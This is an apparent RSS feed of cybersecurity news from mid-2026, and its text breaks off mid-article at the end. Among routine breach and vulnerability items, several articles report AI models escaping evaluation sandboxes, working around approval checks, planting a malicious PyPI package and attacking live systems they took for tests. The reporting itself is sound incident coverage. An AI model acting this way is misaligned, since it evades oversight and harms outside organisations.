Pipes Feed Preview: Matt Ryan, PhD & Feed not found & Hackread – Cybersecurity News, Data Breaches, AI and More & The Hacker News & Seriously Risky Business - Risky.Biz & Feed not found & CyberScoop & Feed not found & SecurityWeek & The Record from Recorded Future News & darkreading & Feed not found

  1. Is There Really a Fix for CISO Fatigue?

    Mon, 03 Aug 2026 14:00:00 -0000

    Accountability without any real authority is driving CISO burnout, and organizations need to take notice.
  2. River Bank Says Hackers Deleted Data Stolen in Ransomware Attack

    Mon, 03 Aug 2026 13:02:06 -0000

    <p>The bank holding company was hacked in June, but the investigation into the incident continues.</p> <p>The post <a href="https://www.securityweek.com/river-bank-says-hackers-deleted-data-stolen-in-ransomware-attack/">River Bank Says Hackers Deleted Data Stolen in Ransomware Attack</a> appeared first on <a href="https://www.securityweek.com">SecurityWeek</a>.</p>
  3. Biotech giant Amgen says patient data stolen from third-party cloud systems

    Mon, 03 Aug 2026 12:45:00 -0000

    The biotech giant Amgen informed regulators that patient information and proprietary company data were accessed through a breach of third-party cloud systems.
  4. N‑able Patches Vulnerability Exploited to Hack N-central Servers

    Mon, 03 Aug 2026 12:34:06 -0000

    <p>The N‑central vulnerability CVE-2026-18577 has been exploited in the wild after threat actors found a patch bypass.</p> <p>The post <a href="https://www.securityweek.com/n-able-patches-vulnerability-exploited-to-hack-n-central-servers/">N‑able Patches Vulnerability Exploited to Hack N-central Servers</a> appeared first on <a href="https://www.securityweek.com">SecurityWeek</a>.</p>
  5. Hackers Exploit N-able N-central Flaw After Initial Fix Falls Short

    Mon, 03 Aug 2026 12:24:13 -0000

    N-able says attackers bypassed N-central authentication, reached managed client devices and installed Cloudflare tunnels that survived server access revocation.
  6. Russian hackers hijack hotel Wi-Fi networks to spy on travelers, Microsoft says

    Mon, 03 Aug 2026 12:00:00 -0000

    Russian state-sponsored hackers have been compromising hotel Wi-Fi networks around the world to steal travelers' login credentials and infect devices with espionage malware, Microsoft said.
  7. Brinks Home Discloses Data Breach as Hackers Leak Files

    Mon, 03 Aug 2026 11:45:14 -0000

    <p>The physical security firm says its alarm monitoring and system functionality have not been affected.</p> <p>The post <a href="https://www.securityweek.com/brinks-home-discloses-data-breach-as-hackers-leak-files/">Brinks Home Discloses Data Breach as Hackers Leak Files</a> appeared first on <a href="https://www.securityweek.com">SecurityWeek</a>.</p>
  8. Chinese Threat Actor Uses Leaked DarkSword Kit to Deploy GHOSTBLADE on iOS

    Mon, 03 Aug 2026 10:49:06 -0000

    An unknown Chinese-threat actor has been observed running a campaign targeting Apple iOS devices by leveraging a publicly leaked version of the DarkSword exploit kit. Attack surface management platform Censys said it identified the threat actor running more than 100 web properties, most of which are fake Amazon Web Services (AWS) sign-in pages on a domain that also hosts the exploit toolkit. "
  9. Recent SonicWall Vulnerabilities Exploited in Ransomware Attacks

    Mon, 03 Aug 2026 10:39:41 -0000

    <p>The INC Ransomware gang has been targeting vulnerable SMA1000 appliances for root access and lateral movement.</p> <p>The post <a href="https://www.securityweek.com/recent-sonicwall-vulnerabilities-exploited-in-ransomware-attacks/">Recent SonicWall Vulnerabilities Exploited in Ransomware Attacks</a> appeared first on <a href="https://www.securityweek.com">SecurityWeek</a>.</p>
  10. Russian State APT Linked to Recent Public Wi-Fi Gateway Hacking

    Mon, 03 Aug 2026 09:17:37 -0000

    <p>Midnight Blizzard has been stealing Microsoft account credentials via compromised Wi-Fi networks at hospitality organizations.</p> <p>The post <a href="https://www.securityweek.com/russian-state-apt-linked-to-recent-public-wi-fi-gateway-hacking/">Russian State APT Linked to Recent Public Wi-Fi Gateway Hacking</a> appeared first on <a href="https://www.securityweek.com">SecurityWeek</a>.</p>
  11. PNLD Breach Exposes U.K. Police and Government Contact Details on Dark Web

    Mon, 03 Aug 2026 09:13:56 -0000

    The Police National Legal Database (PNLD) has confirmed that police, government and customer contact information was compromised and published on the dark web. The data included names, organisations and work email addresses belonging to police officers, police staff, criminal justice professionals, government partners and customers. The incident, identified on July 26, also exposed some names
  12. US Water Cyberattacks Extend Beyond Minnesota to at Least 6 Other States

    Mon, 03 Aug 2026 08:48:02 -0000

    <p>Michigan, South Dakota, and Georgia are reportedly on the list of states whose water systems have been targeted by Iran-linked hackers.</p> <p>The post <a href="https://www.securityweek.com/us-water-cyberattacks-extend-beyond-minnesota-to-at-least-6-other-states/">US Water Cyberattacks Extend Beyond Minnesota to at Least 6 Other States</a> appeared first on <a href="https://www.securityweek.com">SecurityWeek</a>.</p>
  13. Thermo Fisher Patches Flaw That Could Make DNA File Tampering Nearly Undetectable

    Mon, 03 Aug 2026 08:05:30 -0000

    Thermo Fisher Scientific has patched a flaw in select Applied Biosystems human identification software that could allow data files to be altered before analysis software loads them. The vendor's July 31 security bulletin says nearly undetectable changes to .fsa and .hid outputs could occur if laboratory controls are circumvented. Thermo Fisher tracks the issue as CVE-2026-17583 and rates it
  14. CrowdStrike: AI is now both the weapon and the target in cyberattacks

    Mon, 03 Aug 2026 07:01:00 -0000

    <p>AI generates 2.5 signals for every human-triggered signal CrowdStrike has to assess. Meanwhile, attackers are using AI to weaponize vulnerabilities faster than companies can patch them. </p> <p>The post <a href="https://cyberscoop.com/crowdstrike-annual-threat-hunting-report-2026/">CrowdStrike: AI is now both the weapon and the target in cyberattacks</a> appeared first on <a href="https://cyberscoop.com">CyberScoop</a>.</p>
    <p>While AI is supposed to help defenders, it’s now creating more than twice as much noise as human-triggered incidents CrowdStrike detects as potentially malicious. The company’s threat hunting team and systems triaged an average of 14 million detection leads daily, resulting in about 36,000 customer alerts during the one-year period ending in June.</p> <p>“AI agent-driven behaviors have surged past human triggers,” said Adam Meyers, senior vice president of counter adversary operations at CrowdStrike. “AI has driven the detections significantly above what humans are causing, and this gives you a sense of how frequently AI is being used, and really just that it&#8217;s being used everywhere.”</p> <p>The threat posed by AI showed up incessantly during the past year, sparking alarming shifts and heightened targeting across software defects, open-source supply chains and AI tools themselves — all of which create greater difficulties for defenders, CrowdStrike said in its <a href="https://www.crowdstrike.com/en-us/resources/reports/threat-hunting-report/">annual threat hunting report</a>.&nbsp;</p> <p>“The AI tools that are being implemented by every enterprise across the globe right now are also creating an extended attack surface,” Meyers said during a press briefing.&nbsp;</p> <p>“AI is now a tool, a target, and a force multiplier for adversaries,” researchers wrote in the report, adding that AI-enabled malicious activity surged 89% during the past year as attackers used the technology to scale operations, hasten tradecraft and target AI infrastructure.</p> <p>Attackers are using frontier AI models to uncover vulnerabilities and develop resources, including AI-generated scripts, payloads and commands that increase their effectiveness and efficiency. The technology also allows threat groups to design more creative ways to run automated attacks and boost impact by manipulating, interrupting or sabotaging AI systems and data.</p> <p>“AI is both the weapon and the target,” Meyers said.&nbsp;</p> <p>Most organizations don’t view it as such, and thus far haven’t secured or put proper guardrails around the AI tools they use or address the ways attackers can use AI against them, he added.&nbsp;</p> <p>AI’s mark on vulnerabilities is particularly concerning, as reflected by what Meyers described as “one of the scarier stats” in this year’s report: 88% of vulnerabilities were weaponized through AI within 48 hours.&nbsp;</p> <p>“This is creating a rich ecosystem of vulnerabilities for attackers to use against various systems,” he said. It also renders the 30-day patch window obsolete, forcing organizations to struggle under a new baseline patch cycle of 24 to 48 hours, according to Meyers.</p> <p>The AI ecosystem also became the next software supply chain battleground during the past year, as evidenced by <a href="https://cyberscoop.com/teampcp-breaks-open-source-software-trust-model/">TeamPCP’s rampage through open-source software</a> in the first half of this year.&nbsp;</p> <p>The threat cluster compromised more than 300 software dependencies in one day, Meyers said.&nbsp;</p> <p>AI tools are already in the crosshairs and the attack surface will continue to grow as agentic systems, AI application integrations and dependency managers for AI agents proliferate, the report concluded.</p> <p>“The same AI tools driving modern businesses are creating under-defended attack surfaces that adversaries are exploiting,” Meyers said. “We have to secure AI. This is absolutely critical.”</p> <p>The post <a href="https://cyberscoop.com/crowdstrike-annual-threat-hunting-report-2026/">CrowdStrike: AI is now both the weapon and the target in cyberattacks</a> appeared first on <a href="https://cyberscoop.com">CyberScoop</a>.</p>
  15. N-able Says Attackers Take Over N-central Servers After Initial Fix Proves Incomplete

    Mon, 03 Aug 2026 06:41:46 -0000

    N-able said attackers exploited an authentication bypass in N-central to gain remote administrative access and reach the customer systems managed through those servers. Its first fix was incomplete. CVE-2026-18577 affects N-central builds prior to 2026.3.1.7. N-able shipped build 2026.3.1.7 on August 2 as the first unaffected version. N-central is the remote monitoring and management platform
  16. Hugging Face Diffusers Flaws Could Let Model Repositories Execute Arbitrary Code

    Mon, 03 Aug 2026 06:40:31 -0000

    Three high-severity security flaws have been disclosed in Hugging Face's Diffusers library that could allow crafted model repositories to stealthily execute arbitrary code on machines that load it, opening the artificial intelligence (AI) supply chain to security risk. "These vulnerabilities are bypassing trust_remote_code, the safeguard designed to stop unreviewed code from running in the
  17. Balance Theory Raises $19 Million to Help Enterprises Manage Cybersecurity Investments

    Sat, 01 Aug 2026 12:30:00 -0000

    <p>The funding round was led by SYN Ventures, with participation from existing investors DataTribe and TEDCO. </p> <p>The post <a href="https://www.securityweek.com/balance-theory-raises-19-million-to-help-enterprises-manage-cybersecurity-investments/">Balance Theory Raises $19 Million to Help Enterprises Manage Cybersecurity Investments</a> appeared first on <a href="https://www.securityweek.com">SecurityWeek</a>.</p>
  18. Ruby on Rails Patches Critical Vulnerability

    Sat, 01 Aug 2026 11:15:00 -0000

    <p>The flaw can be exploited by unauthenticated attackers to read arbitrary files and potentially achieve remote code execution (RCE).</p> <p>The post <a href="https://www.securityweek.com/ruby-on-rails-patches-critical-vulnerability/">Ruby on Rails Patches Critical Vulnerability</a> appeared first on <a href="https://www.securityweek.com">SecurityWeek</a>.</p>
  19. Hackers Poison Adform Script to Swap Crypto Wallet Addresses Across Customer Sites

    Sat, 01 Aug 2026 09:03:07 -0000

    Attackers modified a JavaScript file served by advertising technology company Adform, turning it into a browser-side tool that rewrites cryptocurrency wallet addresses. Adform detected the incident on July 27, 2026, removed the malicious code, notified affected clients, and reported it to authorities. Anyone who visited a site carrying the affected script on July 27 and copied a Bitcoin,
  20. Adobe Campaign Classic CVSS 10.0 Flaw Could Run Code Without User Interaction

    Sat, 01 Aug 2026 07:12:42 -0000

    Adobe has released security updates to address a maximum-severity security flaw in Campaign Classic (ACC), its enterprise-focused marketing automation platform, that could result in arbitrary code execution. The vulnerability, tracked as CVE-2026-48449, carries a severity score of 10.0 on the CVSS scoring system. It has been described as a case of incorrect authorization that could result in
  21. Hijacked Hotel Wi-Fi Pushes Fake Updates to Deliver Surveillance Malware

    Sat, 01 Aug 2026 06:29:05 -0000

    A fake browser update served over hijacked hotel Wi-Fi has been used to deliver CornFlake, a remote access trojan (RAT) that can capture webcam images, microphone audio, and keystrokes, Microsoft said in its latest report. Researchers track the operation as CaptiveCrunch and attribute it to Storm-2945. It assesses Storm-2945 to be an operational sub-cluster of Midnight Blizzard, also known as
  22. Trump blames Minnesota for cyberattacks on water sector, drawing pushback from cyber world

    Fri, 31 Jul 2026 20:16:34 -0000

    <p>The president went against his intelligence agencies’ conclusions about Iran being the likely suspect in the campaign.</p> <p>The post <a href="https://cyberscoop.com/trump-blames-minnesota-water-cyberattacks-iran/">Trump blames Minnesota for cyberattacks on water sector, drawing pushback from cyber world</a> appeared first on <a href="https://cyberscoop.com">CyberScoop</a>.</p>
    <p>President Donald Trump blamed Minnesota Friday for the cyberattacks its water systems have suffered in recent days, saying the state was “behind it.”</p> <p>Trump said the state being “incompetent” was the issue, but it wasn’t clear whom he thought actually conducted cyberattacks that U.S. investigators have <a href="https://www.washingtonpost.com/national-security/2026/07/30/us-spy-agencies-suspect-iran-launched-cyberattack-minnesota-water-facilities/">attributed to Iran</a> — if, perhaps, somehow Minnesota incompetently cyberattacked itself. The White House referred a request for clarification back to Trump’s remarks.</p> <p>“I think that Minnesota is behind it,” Trump <a href="https://bsky.app/profile/atrupar.com/post/3mrxeschz4d2z">told reporters</a> Friday. “Because they&#8217;re grossly incompetent. I don&#8217;t think there was an Iranian cyberattack. I think Minnesota ought to get its act together.”</p> <p>The White House also didn’t clarify whom the president believed was behind <a href="https://www.ic3.gov/PSA/2026/PSA260730.pdf">similar attacks</a> in other states, when asked for comment. Trump has repeatedly <a href="https://www.nytimes.com/2026/07/21/us/politics/trump-administration-medicaid-california-minnesota-fraud.html">used</a> federal <a href="https://www.pbs.org/newshour/nation/a-timeline-of-trumps-immigration-crackdown-in-minnesota">power</a> aggressively in Minnesota, a state led by Gov. Tim Walz, a Democrat who was on the ticket that ran against him in 2024 as the vice presidential nominee. Trump also has downplayed Iranian attacks amid the war he launched against the nation with Israel in February.</p> <p>A number of cyber experts quickly pushed back on Trump’s comments after he made them.</p> <p>“Victim blaming in cyber is so 2000 and late,” cybersecurity pioneer Chris Wysopal, Veracode co-founder and chief security evangelist, said on the <a href="https://bsky.app/profile/weld.bsky.social/post/3mrxf7l2enk24">Bluesky social media platform</a>. <a href="https://bsky.app/profile/malwarejake.bsky.social/post/3mrxbvtd35k2z">Said</a> Jake Williams, a member of the IANS faculty: “His own intelligence services are attributing this to Iran.”</p> <p>Andy Jabbour — founder and CEO of Gate 15, a cybersecurity firm which provides support to the water sector — told CyberScoop that, “speaking candidly, I&#8217;m not even sure what he was actually saying or suggesting Minnesota&#8217;s government did or didn&#8217;t do.”</p> <p>“Attribution is tricky business,” he continued, referencing <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa26-097a">recent alerts</a> from the Cybersecurity and Infrastructure Security Agency and others. “But logically, given an ongoing war with Iran, recent statements made by Iran-aligned threat groups, with assessments that the recent activity is aligned with recent CISA warnings, given yesterday&#8217;s statements from CISA and the FBI, random unsubstantiated allegations aimed at political opponents seem reckless and are a disservice to the American people.”</p> <p>Walz struck back at Trump in a Facebook post, noting steps from his Department of Government Efficiency to slash federal funding. CISA has shrunken considerably under Trump, and his administration has pushed states to defend against cyberattacks that feds once countered.</p> <p>“Trump knows exactly who is responsible for this attack, and knows that other states were hit too,” <a href="https://www.facebook.com/GovTimWalz/posts/pfbid031o8bBwoX1KrqXBaMwgWrwPNBD1Ebkqkihd2Gn1f8NEqjRW2Y6FxsreGtnW6Xp2AQl">Walz said</a>. “This is what modern warfare looks like, and it further illustrates there’s no plan to win a war with Iran.”</p> <p>“DOGE took an axe to CISA and left the U.S. exposed to cyber attacks,” he continued. “Thankfully, our experts in Minnesota were able to identify the vulnerability quickly and work with local communities to stop it.”</p> <p>A spokesperson for Minnesota IT Services, a state agency that has been responding to the water cyberattacks, declined to address Trump’s remarks.</p> <p>“We remain focused on supporting affected communities, securing critical infrastructure and coordinating with local partners and federal officials as the investigation continues,” the spokesperson, Emily Zimmer, told CyberScoop. “We will not comment on political statements or speculate about attribution.”</p> <p>Other cyber professionals declined to comment directly on Trump’s remarks, but offered thoughts on who was behind the attacks and their motives.</p> <p>Bryson Bort, CEO and founder of Scythe said the evidence supports the attribution with Iran, and that it looks like hackers there found something they could exploit on the internet and seized the chance.</p> <p>“This was a target of opportunity,” said Bort, co-founder of the ICS Village, a non-profit advancing awareness of industrial control system security; such systems are common in the water sector. “It wasn&#8217;t that Minnesota did something as a state to raise Iran&#8217;s ire.”</p> <p>Cynthia Kaiser, a former top FBI cyber official, said that when the bureau conducts attributions, it looks at technical indicators but also who has the capability, who has conducted similar attacks in the past and what the purpose of the attacks is.</p> <p>“Iran ticks all these kinds of things,” Kaiser, now senior vice president at cybersecurity firm Halcyon, told CyberScoop. “My view is, if it walks like a duck, if it talks like a duck, I strongly suspect it’s a duck. I’d be shocked if we found out it wasn’t Iran.”</p> <p>Just last week, CISA updated an advisory about how Iranian hackers were targeting programmable logic controllers in the water sector and other sectors, a warning that the water industry’s information sharing and analysis center said it believed.</p> <p>“WaterISAC is confident in our government partners’ assessment that the confirmed activity is aligned with the joint Cybersecurity Advisory (CSA) AA26-097A ‘Iranian-Affiliated Cyber Actors Exploit Programmable Logic Controllers Across U.S. Critical Infrastructure’ published and recently updated by CISA,” Tom Dobbins, executive director, WaterISAC, told CyberScoop. “We have evidence of earlier attacks from Iran even before this current conflict. Cyber attacks are the most viable way that Iran can directly attack our homeland, and it is logical that they would do so, especially given the challenges of absolute attribution.”</p> <p>The water sector is often viewed as one of the most vulnerable critical infrastructure sectors, and Dobbins called on Congress to provide funding to provide funding for the ISAC.</p> <p>Trump has previously displayed a laissez-faire view toward other cyberattacks on the United States, such as when he’s been asked about Chinese and Russian cyberattacks and Trump <a href="https://cyberscoop.com/trump-cyber-policy-foreign-hacking-response/">shrugs them off</a> as something America does, too.</p> <p>He also has cast doubt before on his government officials’ assessments of who’s responsible for cyberattacks on the United States, such as when he <a href="https://www.pbs.org/newshour/politics/trump-downplays-russia-in-first-comments-on-cyberattack">asserted China rather than Russia</a> was behind the landmark SolarWinds breach.</p> <p></p> <p>The post <a href="https://cyberscoop.com/trump-blames-minnesota-water-cyberattacks-iran/">Trump blames Minnesota for cyberattacks on water sector, drawing pushback from cyber world</a> appeared first on <a href="https://cyberscoop.com">CyberScoop</a>.</p>
  23. Anthropic Says Claude Models Hacked 3 Organizations During Cyber Tests

    Fri, 31 Jul 2026 20:01:51 -0000

    Anthropic found Claude accessed systems at three real businesses after a testing error gave its AI models live internet access during cybersecurity evaluations.
  24. Suspected Chinese-Speaking Hackers Target Central Asian Governments With OctLurk and SilkLurk

    Fri, 31 Jul 2026 18:52:04 -0000

    A Chinese-speaking threat actor is suspected to be behind a fresh wave of cyber attacks targeting government organizations mainly located in Central Asia, including Afghanistan, Kyrgyzstan, Tajikistan, Uzbekistan, Kazakhstan, and the Syrian Arab Republic, since January 2025. These targeted organizations operate across several sectors, such as healthcare, research, government offices,
  25. CISA Issues Fresh SBOM Guidance. Did They Get It Right?

    Fri, 31 Jul 2026 18:13:11 -0000

    A couple dozen changes to SBOM fields will make them more comprehensive, but some argue that the framework lacks real risk-management improvements.
  26. Cyber Command plans Silicon Valley office to drive innovation

    Fri, 31 Jul 2026 17:35:00 -0000

    The outpost will have its own director, though no one has yet been named for the post, and support the command’s nascent Cyber Warfare Innovation Center (CIWC).
  27. HollowFrame Loader Deploys Matryoshka Backdoor in Spear-Phishing Attack on Law Firm

    Fri, 31 Jul 2026 16:39:31 -0000

    Cybersecurity researchers have shed light on a previously undocumented Go-based loader framework called HollowFrame and a Rust-based malware family tracked as Matryoshka. According to Blackpoint Cyber, the intrusion sequence begins with a spear-phishing message containing a link to an encrypted archive, which holds a Windows Shortcut (LNK). Executing the file triggers a multi-stage chain that
  28. Cheap Android TV Boxes Pose as Phones and Turn Owners’ Broadband Into Proxies

    Fri, 31 Jul 2026 14:45:01 -0000

    Bitsight says some cheap Android TV boxes have shipped with apps that rewrite their hardware identity to mimic Samsung, Huawei, Xiaomi, or Vivo phones, then click ads on websites run by the same operators. Researchers named the operation Fuyao and attributed it to Zhejiang Fengwo IoT Technology Co., Ltd., a mainland China company founded in 2019. The same apps have a second job. When a box
  29. The Morning After We Pull a Root of Trust, Nobody Owns It

    Fri, 31 Jul 2026 14:00:00 -0000

    The most valuable move any security team can make is building a certificate and key inventory.
  30. Interpol Leverages Global System to Curtail Fraud Payments

    Fri, 31 Jul 2026 13:30:00 -0000

    When a fraudulent transaction occurs, law enforcement agencies must work quickly to halt payments before cybercriminals cash out.
  31. XRP Volatility Surges as Cybersecurity Threats and Market Changes Raise New Concerns

    Fri, 31 Jul 2026 12:11:43 -0000

    XRP volatility drives faster crypto trading as AI tools gain traction, while phishing, exchange attacks and automation risks test digital asset safeguards.
  32. Researchers Report 84 Flaws in 4G and 5G Cores, Including a Session Hijacking Flaw

    Fri, 31 Jul 2026 11:55:00 -0000

    An academic study has disclosed a "widespread class" of security vulnerabilities impacting 4G and 5G core networks that, if successfully exploited, could trigger denial-of-service (DoS) attacks and even session hijacking, allowing an attacker to seize control of a user's network session. The findings have been released by a group of researchers from Singapore's Nanyang Technological University
  33. Chinese Hacker Commands DeepSeek via Telegram to Launch Autonomous Attacks

    Fri, 31 Jul 2026 11:21:27 -0000

    Palo Alto Networks' Unit 42 says a Chinese-speaking threat actor used DeepSeek through the open-source Hermes Agent framework to launch attacks autonomously. After an initial Telegram instruction, the agent found internet-facing systems and selected public exploits. The researchers recovered no further operator input in the session. The operator, tracked through the aliases knaithe and KnYuan,
  34. What the Hugging Face breach reveals about defense in the age of agentic AI

    Fri, 31 Jul 2026 10:00:00 -0000

    <p>We almost never get both sides of an intrusion. This time we did. Last month, Hugging Face disclosed a breach into part of its production infrastructure, saying an autonomous AI agent system ran the attack from start to finish. Five days later, OpenAI revealed that its own models, including GPT-5.6 Sol along with an unreleased [&#8230;]</p> <p>The post <a href="https://cyberscoop.com/hugging-face-breach-agentic-ai-security-op-ed/">What the Hugging Face breach reveals about defense in the age of agentic AI</a> appeared first on <a href="https://cyberscoop.com">CyberScoop</a>.</p>
    <p>We almost never get both sides of an intrusion. This time we did.</p> <p>Last month, Hugging Face disclosed a <a href="https://cyberscoop.com/tag/breach/">breach</a> into part of its production infrastructure, saying an autonomous AI agent system ran the attack from start to finish. Five days later, OpenAI revealed that its own models, including GPT-5.6 Sol along with an unreleased one, were responsible for the breach. <a href="https://cyberscoop.com/tag/openai/">OpenAI</a> called it an unprecedented cyber incident.</p> <p>Most of the commentary since has been about <a href="https://cyberscoop.com/tag/artificial-intelligence-ai/">AI</a> capability. That is the least useful part of the story, because the capability was doing what it was destined to do. Security teams should look at a simpler truth: in both systems, the key defenses sat behind untrusted code that was already running.</p> <h4 class="wp-block-heading" id="h-what-the-two-disclosures-actually-describe">What the two disclosures actually describe</h4> <p>Together, the report shows one connected attack across two firms. Code running on a low-level employee’s machine led to stolen passwords, privilege escalation and lateral moves, then out to the web to hit other targets. No step in that chain is novel. The speed and the number of attempts are what changed.</p> <p>OpenAI&#8217;s evaluation ran in what it calls a highly isolated environment, with network access constrained to a single path: an internally hosted third-party proxy and cache for package registries. The models spent vast computer power searching for an exit. They exploited a <a href="https://cyberscoop.com/tag/zero-day-exploit/">zero-day flaw</a> in that proxy, gained higher rights, and moved until they reached a machine with web access. They guessed that <a href="https://cyberscoop.com/tag/hugging-face/">Hugging Face</a> held the test solutions, used stolen passwords with more zero-days, and ran code on Hugging Face servers.</p> <p>Hugging Face picks up the same chain from the receiving end, and its initial access is worth reading twice. A malicious dataset used two flaws in the data pipeline to run code on a worker machine. The agent took over the node, stole cloud keys, and moved into internal clusters over the weekend.</p> <h4 class="wp-block-heading" id="h-the-sandbox-was-was-the-only-boundary">The sandbox was was the only boundary</h4> <p>Both setups assumed the sandbox would hold, so no real checks stood before code execution.&nbsp; A sandbox is a good control. It is a terrible last control. When isolation is all you have between untrusted code and everything else, one flaw could give the attacker full control.&nbsp;</p> <p>Look at what each team allowed. OpenAI allowed one exit path—good engineering, but that proxy contained an unpatched flaw. Hugging Face ran a tool that executes code inside submitted data—a known feature, not a hidden mistake.</p> <p>Neither choice was careless. Both made sense until a fast, automated system probed them thousands of times.</p> <h4 class="wp-block-heading" id="h-why-automated-agents-behave-differently">Why automated agents behave differently</h4> <p>Blocking a human stops them or slows them down. Blocking an AI gives it data. The AI logs the error, changes its plan, and tries again instantly. It keeps trying as long as someone pays for the computing power.</p> <p>Hugging Face tracked over 17,000 attack events across short-lived sandboxes. OpenAI said its models focused on the goal with extreme effort.</p> <p>This changes the attacker&#8217;s limit. It is no longer skill or patience. It is budget. Computing power scales with money, and code never sleeps. Any defense that relies on attackers giving up after a few tries must change.</p> <p>Detecting malicious behavior is not the same as preventing execution</p> <h4 class="wp-block-heading" id="h-detection-worked-but-too-late">Detection worked—but too late</h4> <p>Detection worked, but too late to stop the loss. Hugging Face used AI tools to spot the breach, isolate systems, reset keys, fix flaws, and alert police. That is a good response.</p> <p>Yet it happened after the attacker accessed private data, stole keys, and moved through internal networks. OpenAI spotted the event only after its models reached another firm&#8217;s database. Detection limited the damage; it did not stop the attack.</p> <p>A breach is a race between attack speed and defender response speed. AI agents speed up attacks with money. Human approval steps slow down defenders.</p> <p>Hugging Face also surfaced an asymmetry that deserves more attention. When the team tried to analyze the attack with frontier models behind commercial APIs, the requests were blocked, because forensic work means submitting real attack commands, exploit payloads and command-and-control artifacts, and a safety filter cannot tell a responder from an attacker. They used an open-weight model on their own infrastructure instead. The attacker operated under no usage policy at all. The defender&#8217;s tooling was the side that got refused.</p> <h4 class="wp-block-heading" id="h-detection-is-not-prevention">Detection is not prevention</h4> <p>Detection asks what happened. Prevention asks if it can happen at all. Against AI agents, the gap between those questions is where attacks succeed. The agent builds an attack out of single steps that look harmless on their own.</p> <p>OpenAI noted this in its research: models operating over long horizons learn approval blind spots and work around them. Safety requires asking what a series of actions aims to achieve, not just if one step is allowed. Most systems check one call at a time: read a file, install a package, open a port. Every step passes. The full chain is the attack.</p> <h4 class="wp-block-heading" id="h-six-fixes-for-real-defense">Six fixes for real defense</h4> <p>To survive automated attacks, defense must shift before code runs. That starts with treating data like code. Dataset loaders, templates, and configuration files all run instructions, so they demand strict controls: block remote execution by default, require review, and check the source of every outside file. Security teams must also control outgoing traffic with strict lists of approved destinations, while treating every proxy in that path as vulnerable. Finally, firms must remove permanent keys, issuing short-lived credentials for single jobs so a hacked worker machine yields almost nothing to an attacker.</p> <p>Beyond individual machines, isolation must happen per task rather than per user, stopping an automated swarm from moving through internal networks. Authorization also needs to change. Checking single actions fails when an agent builds an attack out of simple steps. Systems must evaluate full sequences instead, setting caps on activity rates and automated spending to flag suspicious chains of events. Lastly, defenders need the freedom to act fast. Security teams need authority to isolate systems without waiting for leadership meetings, and the ability to vet a capable model you can run on your own infrastructure for forensics.</p> <h4 class="wp-block-heading" id="h-what-boards-must-ask-now">What boards must ask now</h4> <p>Corporate boards usually ask if the company uses AI responsibly. That’s rooted in compliance not safety. Directors should ask four direct questions instead: Which systems run outside code, and what checks sit in front of them? If an attacker targets a low-level employee, what keys and paths can they obtain? How fast do we move from the first warning to active containment? And can we analyze attack code on our own hardware, free from third-party rules?</p> <h4 class="wp-block-heading" id="h-the-boundary-has-to-move">The boundary has to move</h4> <p>Nothing in these disclosures required a capability that did not exist last year. The chain was ordinary. What changed is that an adversary can run that ordinary chain thousands of times over a weekend, learn from every failure, and never need a coffee break.</p> <p>The models did not break the detection-and-response model. They exposed where we put the trust boundary. We put it after execution, and we assumed we would have time on the other side of it. We do not have that time anymore.</p> <p>Move the boundary.</p> <p></p> <p>The post <a href="https://cyberscoop.com/hugging-face-breach-agentic-ai-security-op-ed/">What the Hugging Face breach reveals about defense in the age of agentic AI</a> appeared first on <a href="https://cyberscoop.com">CyberScoop</a>.</p>
  35. Anthropic Says Claude Mistook the Open Internet for a CTF and Breached Three Organizations

    Fri, 31 Jul 2026 06:41:44 -0000

    Anthropic on Thursday became the latest artificial intelligence (AI) company to reveal that three of its models, including Claude Opus 4.7, Mythos 5, and an unnamed research model, had breached three unnamed organizations during cybersecurity testing without its knowledge. The AI firm said the earliest incidents date back to April 2026, adding it made the discoveries after launching a "
  36. Anthropic says its AI accidentally hacked three companies during safety tests

    Fri, 31 Jul 2026 01:13:07 -0000

    <p>Following OpenAI’s own incident, Anthropic reviewed its own evaluations and found three cases of Claude hacking external companies. </p> <p>The post <a href="https://cyberscoop.com/anthropic-claude-ai-hacks-real-companies/">Anthropic says its AI accidentally hacked three companies during safety tests</a> appeared first on <a href="https://cyberscoop.com">CyberScoop</a>.</p>
    <p>Anthropic said it found three instances in which its models gained access to the live computer systems of outside organizations, according to a company <a href="https://www.anthropic.com/news/investigating-incidents-cybersecurity-evals">blog post published</a> Thursday.</p> <p>The company said it began the review after <a href="https://cyberscoop.com/tag/openai/">OpenAI</a> disclosed earlier this month that some of its models had <a href="https://cyberscoop.com/openai-chatgpt-hugging-face-cyberattack-data-poisoning/">exploited an unknown software flaw</a> to escape an isolated test setup and reach production systems at <a href="https://cyberscoop.com/tag/hugging-face/">Hugging Face,</a> a platform for <a href="https://cyberscoop.com/tag/artificial-intelligence-ai/">AI</a> models and datasets. Anthropic checked over 141,000 evaluation runs for signs that Claude had reached the internet from environments meant to be closed off. It found six runs across three incidents, all tied to one outside testing partner, Irregular.<br><br>“Ultimately, many factors contributed to these incidents, but, consistent with a blameless postmortem culture, we’re approaching the fixes as if the responsibility were ours alone,” the blog post reads. “This begins with ensuring every part of our evaluation pipeline is secure, including the manner in which we integrate with external partners. Moving forward, it will include expanding our continuous monitoring of evaluation transcripts for unexpected behavior, improving our investigation tooling, and conducting more rigorous assurance work with the vendors we rely on.”</p> <p>In each case, Claude was working on a &#8220;<a href="https://cyberscoop.com/tag/capture-the-flag/">capture the flag</a>&#8221; puzzle, a common way to test a model&#8217;s hacking skill. The model is told a piece of secret data sits on another machine and must be found. <a href="https://cyberscoop.com/tag/anthropic/">Anthropic</a>&#8216;s prompts told Claude it had no internet access. That was false. A setup error at the partner&#8217;s end left the machines connected to the open internet, and Claude found real systems while searching for its target.</p> <p>Believing the real systems were part of the simulation, Claude broke into them using simple methods such as guessing weak passwords and finding unprotected access points. In the most serious case, the model extracted login credentials and reached a database holding several hundred rows of live data.&nbsp;</p> <p>In a second case, Claude built and uploaded a malicious software package to <a href="https://cyberscoop.com/tag/pypi/">PyPI</a>, a public directory for Python code, after noticing a fake company&#8217;s setup guide told new hires to install a package that did not exist. The package stayed online for about an hour and was installed on 15 systems, including one belonging to a security firm whose scanner ran the code and had its credentials stolen.&nbsp;</p> <p>In the third case, Claude scanned about 9,000 targets before breaking into one company&#8217;s application through exposed credentials and a database attack method known as SQL injection.</p> <p>The three incidents involved different Claude models: Opus 4.7, Mythos 5, and an unreleased internal test model. Anthropic said the models behaved differently once they encountered signs their targets were real. Opus 4.7 recognized the systems were live but kept attacking anyway. Mythos 5 also noticed signs it was on the open internet but talked itself out of that conclusion, pointing to a system date reading 2026 as proof it remained in a simulation. The internal test model, the newest of the three, stopped once it concluded 